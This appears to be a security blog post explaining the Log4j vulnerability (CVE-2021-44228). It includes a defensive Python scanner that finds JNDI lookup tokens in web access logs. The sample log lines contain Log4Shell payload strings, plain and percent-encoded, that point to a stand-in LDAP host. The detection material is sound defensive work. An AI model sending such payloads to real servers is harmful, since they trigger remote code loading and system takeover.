Analyzing Attack Data and Trends Targeting Log4J

The Log4j vulnerability, initially reported in November 2021, has affected millions of devices and applications around the world, and has the potential to allow a malicious actor to take full control of vulnerable devices. Because of how Log4j handles strings and code when logging, malicious actors can inject malicious code into logs and trick applications into running it. When exploited, the vulnerability inflicts profound damage on affected systems and networks and gives the attacker full takeover of the affected system. This, combined with the ease with which the vulnerability can be exploited, resulted in the associated CVE-2021-44228 receiving the unusually high CVSS score of 10, the maximum score that can be given.
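Because the injected string has to reach a logger, attempts are visible in the request data a web server records. The following is an added example, not code from the original post: a scanner that reports which field of an access-log line carries a Log4j JNDI lookup token (`${jndi:`), the lookup that triggers CVE-2021-44228. It assumes Combined Log Format; the sample lines, addresses and host names are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip, identity, user, [time], "request", status, bytes,
# "referer", "user-agent" (assumed input format for this example).
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
                  r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')
# Log4j lookups are written ${name:...}; lookup names are matched case-insensitively.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def decode_fully(text, max_rounds=3):
    """Percent-decode until stable, so encoded values are compared in clear form."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan(lines):
    """Return (line_number, source_ip, field) for each field carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LINE.match(line.strip())
        if not match:
            continue  # not Combined Log Format; a real pipeline would count these
        for field in ("request", "referer", "agent"):
            if JNDI.search(decode_fully(match.group(field))):
                hits.append((number, match.group("ip"), field))
    return hits

# Constructed sample lines (documentation address ranges, .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://collector.example.invalid/a}"',
    '198.51.100.23 - - [10/Dec/2021:09:15:40 +0000] "GET /?q=%24%7Bjndi%3Aldap'
    '%3A%2F%2Fcollector.example.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '192.0.2.44 - - [10/Dec/2021:09:16:11 +0000] "GET /wp-login.php HTTP/1.1" '
    '200 1843 "-" "Mozilla/5.0"',
    '192.0.2.80 - - [10/Dec/2021:09:17:03 +0000] "GET / HTTP/1.1" 200 512 '
    '"%2524%257Bjndi%253Aldap%253A%252F%252Fcollector.example.invalid%252Fa%257D" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit records an attempt, not a compromise: whether the string was ever evaluated depends on the Log4j version behind the application that logged it.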

This post was originally published on Wordfence by Topher Tebow.
